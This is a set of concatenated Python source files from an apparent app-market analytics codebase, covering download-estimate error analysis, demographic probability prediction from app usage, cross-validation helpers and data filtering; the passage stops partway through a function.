if top!='All':
g = g[:top]
g.sort('sbe_rel_error', ascending=True, inplace=True)
t_under_20 = int((float(g[g['sbe_rel_error']<=0.2].shape[0])/g.shape[0])*100.0)
ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r--', label='%s %% - sbe'%t_under_20)
g.sort('scored_sbe_rel_error', ascending=True, inplace=True)
t_under_20 = int((float(g[g['scored_sbe_rel_error']<=0.2].shape[0])/g.shape[0])*100.0)
ax.plot(g['scored_sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='%s %% - scored sbe'%t_under_20)
g.sort('loginv_sbe_rel_error', ascending=True, inplace=True)
t_under_20 = int((float(g[g['loginv_sbe_rel_error']<=0.2].shape[0])/g.shape[0])*100.0)
ax.plot(g['loginv_sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b--', label='%s %% - loginv sbe'%t_under_20)
g.sort('loginv_scored_sbe_rel_error', ascending=True, inplace=True)
t_under_20 = int((float(g[g['loginv_scored_sbe_rel_error']<=0.2].shape[0])/g.shape[0])*100.0)
ax.plot(g['loginv_scored_sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='%s %% - loginv scored sbe'%t_under_20)
print n
print g[['actual', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error']].describe()
ax.legend(loc=4)
title = '8020 %s top %s'%(n, top)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('data/loginv_plots/%s.png'%title)
plt.close()
def analyze_results(df):
describe = []
df2 = []
df = df.dropna(subset=['actual'])
for n, g in df.groupby(['store_id', 'feed_id', 'category_id', 'date']):
g = g.sort('actual', ascending=False)
g['range'] = '201 to end'
g['range'][:200] = '21 to 200'
g['range'][:20] = '11 to 20'
g['range'][:10] = '1 to 10'
df2.append(g)
df = pd.concat(df2)
del df2
for n, g in df.groupby(['store_id', 'feed_id', 'category_id', 'date', 'range']):
t_under_20 = []
t_under_20.append(float(g[g['sbe_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['scored_sbe_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['loginv_sbe_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['loginv_scored_sbe_rel_error']<=0.2].shape[0])/g.shape[0])
d = g[['store_id', 'feed_id', 'date', 'actual', 'sbe_rel_error', 'scored_sbe_rel_error', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error']].describe()
t_under_20_max = np.max(t_under_20)
s = pd.Series()
s.name = '%_apps_under_20%_error'
d = d.append(s)
s = pd.Series()
s.name = 'best_case'
d = d.append(s)
d['sbe_rel_error']['%_apps_under_20%_error'] = t_under_20[0]
d['scored_sbe_rel_error']['%_apps_under_20%_error'] = t_under_20[1]
d['loginv_sbe_rel_error']['%_apps_under_20%_error'] = t_under_20[2]
d['loginv_scored_sbe_rel_error']['%_apps_under_20%_error'] = t_under_20[3]
d['sbe_rel_error']['best_case'] = 1 if t_under_20[0]==t_under_20_max else 0
d['scored_sbe_rel_error']['best_case'] = 1 if t_under_20[1]==t_under_20_max else 0
d['loginv_sbe_rel_error']['best_case'] = 1 if t_under_20[2]==t_under_20_max else 0
d['loginv_scored_sbe_rel_error']['best_case'] = 1 if t_under_20[3]==t_under_20_max else 0
if d[['sbe_rel_error', 'scored_sbe_rel_error', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error']]['best_case':'best_case'].values.sum() > 1:
#min_error = d[['sbe_rel_error', 'scored_sbe_rel_error', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error']]['mean':'mean'].values.min()
min_error = []
min_error.append(d['sbe_rel_error']['mean'] if d['sbe_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['scored_sbe_rel_error']['mean'] if d['scored_sbe_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['loginv_sbe_rel_error']['mean'] if d['loginv_sbe_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['loginv_scored_sbe_rel_error']['mean'] if d['loginv_scored_sbe_rel_error']['best_case']==1 else 1000.0)
min_error = np.min(min_error)
d['sbe_rel_error']['best_case'] = 1 if (d['sbe_rel_error']['best_case']==1 and d['sbe_rel_error']['mean']==min_error) else 0
d['scored_sbe_rel_error']['best_case'] = 1 if (d['scored_sbe_rel_error']['best_case']==1 and d['scored_sbe_rel_error']['mean']==min_error) else 0
d['loginv_sbe_rel_error']['best_case'] = 1 if (d['loginv_sbe_rel_error']['best_case']== 1 and d['loginv_sbe_rel_error']['mean']==min_error) else 0
d['loginv_scored_sbe_rel_error']['best_case'] = 1 if (d['loginv_scored_sbe_rel_error']['best_case']==1 and d['loginv_scored_sbe_rel_error']['mean']==min_error) else 0
d['store_id'] = n[0]
d['feed_id'] = n[1]
d['category_id'] = n[2]
d['date'] = n[3]
d['range'] = n[4]
describe.append(d)
describe = pd.concat(describe)
return describe
def analyze_category_variation():
pass
def process_file(file_path, country):
df = pd.read_csv(file_path)
#df['store_id'] = df['store_id'].apply(lambda x: config.IOS_STORES_DICT[x])
#df['feed_id'] = df['feed_id'].apply(lambda x: config.IOS_TYPES_DICT[x])
#df['category_id'] = df['category_id'].apply(lambda x: config.IOS_CATEGORIES_DICT[x])
actuals_df = df[['store_id', 'date', 'feed_id', 'app_id', 'actual']].drop_duplicates()
df['loginv_estimate'] = df['t1e']
df['loginv_estimate'][np.isnan(df['loginv_estimate'])==True] = df['t2e'][np.isnan(df['loginv_estimate'])==True]
df['loginv_estimate'][np.isnan(df['tae'])==False] = df['tae'][np.isnan(df['tae'])==False]
df = df.dropna(subset=['loginv_estimate'])
df['loginv_abs_error'] = (df['loginv_estimate'] - df['actual']).abs()
df['loginv_rel_error'] = df['loginv_abs_error'] / df['actual']
df['category_abs_error'] = (df['Daily.Estimate'] - df['actual']).abs()
df['category_rel_error'] = df['category_abs_error'] / df['actual']
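    # Per-observation score: 1 / (rank * relative_error + 1), computed from
    # whichever device rank is present and averaged when both ranks exist.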
df['score'] = 0.0
df['score'][np.isnan(df['iphone_rank'])==False] = 1.0 / ((df['iphone_rank'] * df['loginv_rel_error']) + 1.0)
df['score'][np.isnan(df['ipad_rank'])==False] = 1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)
df['score'][(np.isnan(df['iphone_rank'])==False) &
(np.isnan(df['ipad_rank'])==False)] = ((1.0 / ((df['iphone_rank'] * df['loginv_rel_error']) + 1.0)) + (1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)))/2.0
df['score2'] = 0.0
df['score2'][np.isnan(df['iphone_rank'])==False] = 1.0 / ((df['iphone_rank'] * df['category_rel_error']) + 1.0)
df['score2'][np.isnan(df['ipad_rank'])==False] = 1.0 / ((df['ipad_rank'] * df['category_rel_error']) + 1.0)
df['score2'][(np.isnan(df['iphone_rank'])==False) &
(np.isnan(df['ipad_rank'])==False)] = ((1.0 / ((df['iphone_rank'] * df['category_rel_error']) + 1.0)) + (1.0 / ((df['ipad_rank'] * df['category_rel_error']) + 1.0)))/2.0
categories_df = df[['store_id', 'category_id', 'feed_id', 'date', 'app_id']].drop_duplicates()
scores = df.groupby(['date', 'store_id', 'feed_id', 'category_id']).sum().reset_index()
scores = scores[['date', 'store_id', 'feed_id', 'category_id', 'score', 'score2']]
scores.to_csv('data/category_scores_%s.csv'%country, index=False)
del df['score']
del df['score2']
loginv_sbe_df = df.groupby(['store_id', 'date', 'feed_id', 'app_id']).mean().reset_index()
loginv_sbe_df.rename(columns={'loginv_estimate':'loginv_sbe_estimate',
'Daily.Estimate': 'sbe_estimate'}, inplace=True)
loginv_sbe_df.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
del loginv_sbe_df['actual']
loginv_sbe_df = loginv_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
loginv_sbe_df['sbe_abs_error'] = (loginv_sbe_df['sbe_estimate'] - loginv_sbe_df['actual']).abs()
loginv_sbe_df['sbe_rel_error'] = loginv_sbe_df['sbe_abs_error'] / loginv_sbe_df['actual']
loginv_sbe_df['loginv_sbe_abs_error'] = (loginv_sbe_df['loginv_sbe_estimate'] - loginv_sbe_df['actual']).abs()
loginv_sbe_df['loginv_sbe_rel_error'] = loginv_sbe_df['loginv_sbe_abs_error'] / loginv_sbe_df['actual']
del loginv_sbe_df['category_id']
loginv_sbe_df = loginv_sbe_df.merge(categories_df, on=['store_id', 'feed_id', 'date', 'app_id'])
#df = df[df['date']==df['date'].min()]
loginv_scored_sbe_df = df.drop_duplicates(cols=['store_id', 'date', 'category_id', 'feed_id', 'app_id'])
loginv_scored_sbe_df = loginv_scored_sbe_df.merge(scores, on=['date', 'store_id', 'feed_id', 'category_id'])
loginv_scored_sbe_df['loginv_scored_estimate'] = loginv_scored_sbe_df['loginv_estimate'] * loginv_scored_sbe_df['score']
loginv_scored_sbe_df['scored_estimate'] = loginv_scored_sbe_df['Daily.Estimate'] * loginv_scored_sbe_df['score2']
loginv_scored_sbe_df = loginv_scored_sbe_df.groupby(['store_id', 'date', 'feed_id', 'app_id']).sum().reset_index()
loginv_scored_sbe_df['loginv_scored_estimate'] /= loginv_scored_sbe_df['score']
loginv_scored_sbe_df['scored_estimate'] /= loginv_scored_sbe_df['score2']
loginv_scored_sbe_df.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
loginv_scored_sbe_df.rename(columns={'loginv_scored_estimate': 'loginv_scored_sbe_estimate',
'scored_estimate': 'scored_sbe_estimate'}, inplace=True)
del loginv_scored_sbe_df['actual']
loginv_scored_sbe_df = loginv_scored_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] = (loginv_scored_sbe_df['loginv_scored_sbe_estimate'] - loginv_scored_sbe_df['actual']).abs()
loginv_scored_sbe_df['loginv_scored_sbe_rel_error'] = loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] / loginv_scored_sbe_df['actual']
loginv_scored_sbe_df['scored_sbe_abs_error'] = (loginv_scored_sbe_df['scored_sbe_estimate'] - loginv_scored_sbe_df['actual']).abs()
loginv_scored_sbe_df['scored_sbe_rel_error'] = loginv_scored_sbe_df['scored_sbe_abs_error'] / loginv_scored_sbe_df['actual']
del loginv_scored_sbe_df['category_id']
loginv_scored_sbe_df = loginv_scored_sbe_df.merge(categories_df, on=['store_id', 'feed_id', 'date', 'app_id'])
loginv_scored_sbe_df = loginv_scored_sbe_df[['store_id',
'date',
'feed_id',
'category_id',
'app_id',
'loginv_scored_sbe_estimate',
'loginv_scored_sbe_abs_error',
'loginv_scored_sbe_rel_error',
'scored_sbe_estimate',
'scored_sbe_abs_error',
'scored_sbe_rel_error',
'score',
'score2']]
result = pd.merge(loginv_sbe_df, loginv_scored_sbe_df, on=['store_id', 'date', 'feed_id', 'category_id', 'app_id'])
result['store_id'] = result['store_id'].apply(lambda x: config.IOS_STORES_DICT[x])
result['feed_id'] = result['feed_id'].apply(lambda x: config.IOS_TYPES_DICT[x])
result['category_id'] = result['category_id'].apply(lambda x: config.IOS_CATEGORIES_DICT[x])
#result.to_csv('data/scored_result_%s.csv'%country, index=False)
#plot_8020(result[result['date']=='2013-07-23'], 10)
#plot_8020(result[result['date']=='2013-07-23'], 20)
#plot_8020(result[result['date']=='2013-07-23'], 200)
#plot_8020(result[result['date']=='2013-07-23'])
#plot_estimates(result[result['date']=='2013-07-23'])
describe = analyze_results(result)
describe.to_csv('data/error_describe_%s.csv'%country)
del result
del loginv_scored_sbe_df
def main():
start_country = 143441
for root, dirs, files in os.walk(DATA_DIR):
for file in files:
f = file.split('_')
country = f[2]
if file.endswith(".csv") and int(country)>=start_country:
filepath = os.path.join(root, file)
print filepath
process_file(filepath, country)
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/audience/audience/predict.py
import sys
sys.path.append('../')
import pandas as pd
from correction import process
# monthly_proba() below uses `utils` (get_end_date, get_weekly_end_dates_in_month),
# which was not imported in the original; assuming it lives in the `correction`
# package alongside `process`.
from correction import utils
def all_proba_long(usage, model, bundle_ids, classes, modality, timeframe='weekly'):
"""
Determine age or gender probabilities in long format.
:param usage: dataframe with usage data. Columns include date, device_id and bundle_id
:param model: model used to predict either age or gender
:param bundle_ids: list of bundle IDs used by the model
:param classes: list of bucket labels
:param modality: 'age' or 'gender'
    :param timeframe: indicates the timeframe over which demographics are calculated. Can be 'weekly' or 'monthly'
:returns DataFrame with demographic probabilities
"""
if timeframe == 'weekly':
all_probas = pd.concat((weekly_proba(period_data, model, bundle_ids, classes)
for _, period_data in usage.groupby('date', as_index=False)),
axis=0, ignore_index=True)
else:
tmp_data = usage.copy()
tmp_data['year'] = tmp_data.date.apply(lambda x: x.year)
tmp_data['month'] = tmp_data.date.apply(lambda x: x.month)
all_probas = pd.concat((monthly_proba(period_data, model, bundle_ids, classes)
for _, period_data in tmp_data.groupby(['year', 'month'], as_index=False)),
axis=0, ignore_index=True)
return pd.melt(all_probas, id_vars=['device_id', 'date'],
var_name=modality, value_name='proba')
def calculate_crossed_proba(usage, model_age, bundle_ids_age, classes_age,
model_gender, bundle_ids_gender, classes_gender, timeframe='weekly'):
"""
Calculates naively crossed age-gender probabilities.
:param usage: dataframe with usage data. Columns include date, device_id and bundle_id
:param model_age: model used to predict age
:param bundle_ids_age: list of bundle IDs used by the age assignment model
:param classes_age: list of bucket labels for the age modality
    :param model_gender: model used to predict gender
    :param bundle_ids_gender: list of bundle IDs used by the gender assignment model
    :param classes_gender: list of bucket labels for the gender modality
    :param timeframe: indicates the timeframe over which demographics are calculated. Can be 'weekly' or 'monthly'
:returns DataFrame with crossed demographic probabilities
"""
all_probas_age = all_proba_long(usage, model_age, bundle_ids_age, classes_age,
'age', timeframe=timeframe)
all_probas_gender = all_proba_long(usage, model_gender, bundle_ids_gender, classes_gender,
'gender', timeframe=timeframe)
crossed_probas = pd.merge(all_probas_age, all_probas_gender, on=['device_id', 'date'],
suffixes=['_age', '_gender'])
crossed_probas['proba'] = crossed_probas['proba_age'].multiply(crossed_probas['proba_gender'], axis=0)
crossed_probas['age_gender'] = crossed_probas['age'] + '_' + crossed_probas['gender']
crossed_probas.drop(['age', 'gender', 'proba_age', 'proba_gender'], axis=1, inplace=True)
return crossed_probas
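# Illustrative note (made-up numbers): the naive cross above multiplies the
# independent marginals per device and date, e.g. P(age '13-24') = 0.6 and
# P(gender 'male') = 0.7 give P('13-24_male') = 0.6 * 0.7 = 0.42, with the
# crossed labels joined as '<age>_<gender>'.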
def weekly_proba(usage, model, bundle_ids, classes):
"""
Determine age or gender probabilities on a weekly level.
:param usage: dataframe with usage data. Columns include date, device_id and bundle_id
:param model: model used to predict either age or gender
:param bundle_ids: list of bundle IDs used by the model
:param classes: list of bucket labels
:returns DataFrame with demographic probabilities
"""
sel_usage = usage[usage.bundle_id.isin(bundle_ids)].copy()
sel_usage['dummy'] = 1
sel_usage['dummy'] = sel_usage.dummy.astype('uint8')
pivoted_usage = pd.pivot_table(sel_usage, values='dummy', index='device_id',
columns='bundle_id', fill_value=0)
# Take into account users that may have been removed
missing_devices = (usage.device_id.ix[~usage.device_id.isin(sel_usage.device_id)]).unique()
pivoted_usage = pd.concat([pivoted_usage, pd.DataFrame(0, index=missing_devices, columns=pivoted_usage.columns)], axis=0)
pivoted_usage.sort_index(inplace=True)
pivoted_usage = process.align_bundle_ids(pivoted_usage, bundle_ids)
predicted_probas = pd.DataFrame(model.predict_proba(pivoted_usage),
index=pivoted_usage.index,
columns=classes)
predicted_probas.index.name = 'device_id'
predicted_probas['date'] = sel_usage['date'].iloc[0]
return predicted_probas.reset_index()
def monthly_proba(usage, model, bundle_ids, classes):
"""
Determine age or gender probabilities on a monthly level by averaging individual weekly predictions.
:param usage: dataframe with usage data. Columns include date, device_id and bundle_id
:param model: model used to predict either age or gender
:param bundle_ids: list of bundle IDs used by the model
:param classes: list of bucket labels
:returns DataFrame with demographic probabilities
"""
# Select only the full weeks in the month of data
month_end = utils.get_end_date(usage.date.iloc[0], 'monthly')
valid_week_ends = utils.get_weekly_end_dates_in_month(month_end)
#Select subset of data that actually has full weeks of data
usage = usage.ix[usage.date.isin(valid_week_ends)]
weekly_probability = pd.concat((weekly_proba(period_data, model, bundle_ids, classes)
for _, period_data in usage.groupby('date', as_index=False)),
axis=0, ignore_index=True)
print weekly_probability.head()
monthly_probability = weekly_probability.groupby('device_id').aggregate('mean').reset_index()
monthly_probability['date'] = month_end
return monthly_probability
<file_sep>/old_investigations/android/run_calculate_sda.py
"""
Calculate SDA daily, and monthly.
"""
from optparse import OptionParser
import os.path
from internal.calculate_sda import calculate_sda_and_save
def parse_options():
parser = OptionParser()
parser.add_option('-d', '--downloads', dest='f_downloads',
help='Required. Downloads data, generated by run_fetch_and_concat.py')
parser.add_option('-u', '--usd', dest='f_usd',
help='Required. USD data, generated by run_fetch_and_concat.py')
parser.add_option('-r', '--ref', dest='f_reference',
help='Optional. Reference file, which contains the App that we cares.')
(opts, args) = parser.parse_args()
if not opts.f_downloads or not opts.f_usd:
parser.print_help()
parser.error("Downloads and USD files are necessary!")
if not ('Downloads' in opts.f_downloads and 'USD' in opts.f_usd):
parser.error('Please specify the right Downloads and USD files.')
return opts
if __name__ == '__main__':
opts = parse_options()
if not os.path.exists("sda"):
os.makedirs('sda')
calculate_sda_and_save(opts.f_downloads, opts.f_usd, opts.f_reference)
print("The files should be already generated in ./sda/")
<file_sep>/audience/demographics-review/lib/cv_functions.py
"""
Module for cross validation of ridge regression method.
Main functions:
- cv_k_fold: run K-Folds cross validation using specified regression
- cv_shuffle_split: run ShuffleSplit cross validation using specified regression
- test_error_alpha: compute error on test set as function of alpha
- train_error_alpha: compute error on training set as function of alpha
- plot_learning_curve: plot the test and training learning curve for an estimator
"""
__author__ = 'srhmtonk'
from sklearn import cross_validation
from sklearn.learning_curve import learning_curve
import numpy as np
import matplotlib.pyplot as plt
def cv_k_fold(X, y, estimator_class, test_size=0.1, shuffle=True, coef_threshold=None, **kwargs):
"""
Runs K-Fold cross validation on the provided regression. The number of folds is derived from
size of the test set.
:param X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
:param y: array-like, shape (n_samples), optional
Target relative to X for regression;
None for unsupervised learning.
:param estimator_class: estimator-class
        Class of the estimator to be used for regression
:param test_size: float, optional
Percentage of samples to be used in test set (default 0.1).
:param shuffle: boolean, optional
Determines whether to shuffle the data before splitting (default True).
:param coef_threshold: int, optional
If set the coefficient between -coef_threshold and coef_threshold are
set to zero in the estimation model.
:param kwargs: dictionary, optional
Kwargs to be used as input for the estimator
:return: tuple of numpy arrays, shape (n_samples)
Target vector and Predicted vector
"""
    n_folds = int(np.round(1. / test_size))  # e.g. test_size=0.1 -> 10 folds
cv_split = cross_validation.KFold(y.size, n_folds=n_folds, shuffle=shuffle)
yhat_test = y.copy()
for train, test in cv_split:
reg = estimator_class(**kwargs)
reg.fit(X[train],y[train])
if coef_threshold is not None:
sel_below = np.abs(reg.coef_)<coef_threshold
reg.coef_[sel_below] = 0
yhat_test[test] = reg.predict(X[test])
return y,yhat_test
def cv_shuffle_split(X, y, estimator_class, test_size=0.1, n_iter=10, coef_threshold=None, **kwargs):
"""
Runs ShuffleSplit cross validation on the provided regression. The split size is based on the
size of the test set.
:param X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
:param y: array-like, shape (n_samples), optional
Target relative to X for regression;
None for unsupervised learning.
:param estimator_class: estimator-class
        Class of the estimator to be used for regression
:param test_size: float, optional
Percentage of samples to be used in test set (default 0.1).
:param n_iter: integer, optional
Number of iterations to run cross validation (default 10).
:param kwargs: dictionary, optional
Kwargs to be used as input for the estimator
:return: tuple of numpy arrays, shape (n_samples)
Target vector and Predicted vector
"""
cv_split = cross_validation.ShuffleSplit(y.size, n_iter=n_iter, test_size=test_size)
yhat_test = np.zeros(cv_split.n_test*cv_split.n_iter)
y_test = yhat_test.copy()
fill_range = np.arange(cv_split.n_test)
for i, (train, test) in enumerate(cv_split):
reg = estimator_class(**kwargs)
reg.fit(X[train],y[train])
if coef_threshold is not None:
sel_below = np.abs(reg.coef_)<coef_threshold
reg.coef_[sel_below] = 0
fill_idx = fill_range+i*cv_split.n_test
y_test[fill_idx] = y[test]
yhat_test[fill_idx] = reg.predict(X[test])
return y_test,yhat_test
def test_error_alpha(X, y, estimator_class, metric_class, test_size=0.1, shuffle=True, **kwargs):
"""
Returns a cv_k_fold function that only requires alpha as input. Allowing easier
computation of the test error as function of alpha.
:param X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
:param y: array-like, shape (n_samples), optional
Target relative to X for regression;
None for unsupervised learning.
:param estimator_class: estimator-class
        Class of the estimator to be used for regression
:param metric_class: metric-class
Class of metric used for benchmarking the predictions
:param test_size: float, optional
Percentage of samples to be used in test set (default 0.1).
:param shuffle: boolean, optional
Determines whether to shuffle the data before splitting (default True).
:param kwargs: dictionary, optional
Kwargs to be used as input for the estimator
:return: test function taking only alpha as input parameter
"""
def conf_cv_k_fold(alpha):
y_test,yhat_test = cv_k_fold(X, y, estimator_class, test_size, shuffle, alpha=alpha, **kwargs)
return metric_class(y_test,yhat_test)
return conf_cv_k_fold
def train_error_alpha(X, y, estimator_class, metric_class, **kwargs):
"""
Returns a train regression function that only requires alpha as input. Allowing easier
computation of the train error as function of alpha.
:param X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
:param y: array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
:param estimator_class: estimator-class
        Class of the estimator to be used for regression
:param metric_class: metric-class
Class of metric used for benchmarking the predictions
:param kwargs: dictionary, optional
Kwargs to be used as input for the estimator
:return: train function taking only alpha as input parameter
"""
def conf_train_reg(alpha):
y_train = y
reg = estimator_class(alpha=alpha, **kwargs)
reg.fit(X,y_train)
yhat_train = reg.predict(X)
return metric_class(y_train,yhat_train)
return conf_train_reg
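# Usage sketch (illustrative; assumes scikit-learn's Ridge and
# mean_absolute_error, with X and y as described above). Both helpers return a
# function of alpha, which makes sweeping regularization strengths easy:
#
#   from sklearn.linear_model import Ridge
#   from sklearn.metrics import mean_absolute_error
#   test_err = test_error_alpha(X, y, Ridge, mean_absolute_error)
#   train_err = train_error_alpha(X, y, Ridge, mean_absolute_error)
#   alphas = np.logspace(-3, 3, 13)
#   test_curve = [test_err(a) for a in alphas]
#   train_curve = [train_err(a) for a in alphas]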
#
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
"""
Generate a simple plot of the test and training learning curve. Taken from
http://scikit-learn.org/stable/_downloads/plot_learning_curve.py
:param estimator: object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
:param title: string
Title for the chart.
:param X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
:param y: array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
:param ylim: tuple, shape (ymin, ymax), optional
Defines minimum and maximum yvalues plotted.
:param cv: integer, cross-validation generator, optional
If an integer is passed, it is the number of folds (defaults to 3).
Specific cross-validation objects can be passed, see
sklearn.cross_validation module for the list of possible objects
:param n_jobs: integer, optional
Number of jobs to run in parallel (default 1).
:param train_sizes: array-like, shape (n_sizes), optional
The different train sizes to be used for plotting learning curve
:return: plot
"""
plt.figure(figsize=(10,6))
plt.title(title, fontsize=18)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("$n_{samples}$", fontsize=16)
plt.ylabel("$MAE$", fontsize=16)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes, scoring="mean_absolute_error")
train_scores_mean = np.mean(-train_scores, axis=1)
train_scores_std = np.std(-train_scores, axis=1)
test_scores_mean = np.mean(-test_scores, axis=1)
test_scores_std = np.std(-test_scores, axis=1)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', linewidth=2, color="r",
label="Training error")
plt.plot(train_sizes, test_scores_mean, 'o-', linewidth=2, color="g",
label="Cross-validation error")
plt.legend(loc="best")
return plt<file_sep>/product_quality/internal/args.py
from optparse import OptionParser
from datetime import datetime
from utilities_date import make_last_day_of_month
def parse_options():
parser = OptionParser()
parser.add_option("-s", "--stores", dest="stores",
help="Required. A list of the stores that you want to calculate, separated by comma. e.g. 143441,143444,143462,143465,143466")
parser.add_option("-d", "--daterange", dest="daterange",
help="Required. Date range, could be a single month(e.g. 2012-09), a range of months(e.g. 2012-04--2012-05) " \
"or a range of days(e.g. 2012-03-02--2012-07-08)")
parser.add_option("-u", "--unitstypes", dest="units_types",
help="Required. A list of type of units to inspect (Downloads or USD), separated by comma. e.g. Downloads,USD")
parser.add_option("-p", "--platform", dest="platform",
help="Required. The platform you want to get.")
(opts, args) = parser.parse_args()
try:
return (_refine_options(opts), args)
except Exception:
        parser.print_help()
def _refine_options(opts):
opts.stores = opts.stores.split(',')
opts.units_types = opts.units_types.split(',')
def convert_month_str(index, s):
"""
index=0: The first date in the daterange.
index=1: The second date in the daterange.
"""
s_split_len = len(s.split('-'))
if s_split_len == 3:
return datetime.strptime(s, '%Y-%m-%d')
elif s_split_len == 2:
d = datetime.strptime(s, '%Y-%m')
if index == 0:
# In this case d would be the first day of the month
# and it's exactly what we want
return d
else:
return make_last_day_of_month(d)
else:
raise Exception("Wrong month format")
months_split = opts.daterange.split('--')
opts.daterange = map(lambda x: convert_month_str(x[0], x[1]),
enumerate(months_split))
# When we have only one date and it's a month,
# that means we want a single month's data.
if (len(opts.daterange) == 1) and (len(months_split[0].split('-')) == 2):
opts.daterange.append(make_last_day_of_month(opts.daterange[0]))
return opts
<file_sep>/aa_au_model/correction/process.py
__author__ = 'hgriffioen'
import data
import pandas as pd
import warnings
from itertools import product
from utils import OrderedLabelEncoder
USAGE_DEVICE_DATA_TYPE = 'uint8'
def filter_data(usage, devices, demographics, platform, start_date, end_date):
"""
Filter usage and demographics data in for a platform, period and active devices.
:param usage: Usage (see data.load_usage())
:param devices: Device info (see data.load_devices())
:param demographics: Demographics data (see e.g. data.load_adx())
:param platform: String ('iOS', 'iPhone' or 'iPad')
:param start_date: datetime with start date
:param end_date: datetime with end date
:return: (DataFrame with device usage, DataFrame with demographics data)
"""
active_devices = filter_devices(devices, platform, start_date, end_date)
demographics_window = filter_device_demographics(demographics, active_devices.device_id)
device_usage_window = get_usage_per_device(usage, active_devices.device_id,
start_date, end_date)
return device_usage_window, demographics_window
def construct_dataset(device_usage, demographics, modality, bundle_ids=None):
"""
Construct a dataset.
:param device_usage: Usage (see filter_data())
:param demographics: Demographics data (see e.g. data.load_adx())
:param modality: Dictionary with modality and value to use (e.g. {'gender': 'male', 'age_bin': '13-24})
:param bundle_ids: bundle ID's to use for column alignment
:return: (DataFrame with known usage, DataFrame with unknown usage, Series with labels,
LabelEncoder)
"""
labels, label_encoder = construct_labels(demographics, device_usage.index, modality)
known_usage, unknown_usage = split_users(device_usage, labels)
if bundle_ids is None:
bundle_ids = known_usage.columns
known_data = align_bundle_ids(known_usage, bundle_ids)
unknown_data = align_bundle_ids(unknown_usage, bundle_ids)
return known_data, unknown_data, labels, label_encoder
def filter_devices(devices, platform, start_date, end_date):
"""
Filter active devices based on platform and being active in a timeframe.
:param devices: DataFrame with device info
:param platform: String ('iOS', 'iPhone' or 'iPad')
:param start_date: datetime with start date
:param end_date: datetime with end date
:return: DataFrame with active devices for a platform in a timeframe
"""
platform_devices = _get_platform_devices(devices, platform)
active_devices = data.load_active_devices(start_date, end_date)
return pd.merge(platform_devices, pd.DataFrame(active_devices), on='device_id')
def _get_platform_devices(devices, platform):
"""
    Get devices for a platform.
    :param devices: DataFrame with all devices
    :param platform: String ('all', 'iOS', 'iPhone', 'iPad' or 'Android')
    :return DataFrame with platform devices
"""
if platform == 'all':
is_on_platform = devices.platform.isin(('iOS', 'Android'))
elif platform == 'iOS':
is_on_platform = devices.platform == 'iOS'
elif platform == 'Android':
is_on_platform = devices.platform == 'Android'
elif platform == 'iPhone':
is_on_platform = ((devices.platform == 'iOS') & (devices.device_type == 'Smartphone'))
elif platform == 'iPad':
is_on_platform = ((devices.platform == 'iOS') & (devices.device_type == 'Tablet'))
else:
raise Exception('Unknown platform: %s' % platform)
return devices[is_on_platform]
def filter_device_demographics(df, device_ids, platform=None):
"""
    Filter demographics data for a platform and a set of devices.
:param df: DataFrame with demographics data
:param device_ids: List of relevant device ID's
:param platform: String with platform ('iOS', 'iPhone' or 'iPad')
:return DataFrame with filtered demographics data
"""
if platform:
warnings.warn("Parameter platform has been deprecated")
is_device_usage = df.device_id.isin(device_ids)
temp_df = df[is_device_usage].copy()
temp_df.sort(['device_id', 'bundle_id', 'date'], inplace=True)
unique_df = temp_df.drop_duplicates(['device_id', 'bundle_id'], take_last=True)
return unique_df.reset_index(drop=True)
def filter_adx(adx, device_ids, platform=None):
"""
Filter AD-X data for a platform and a set of loaded devices.
:param adx: DataFrame with AD-X data
:param device_ids: List of relevant device ID's
:param platform: String with platform ('iOS', 'iPhone' or 'iPad') (DEPRECATED)
:return DataFrame with filtered AD-X data
"""
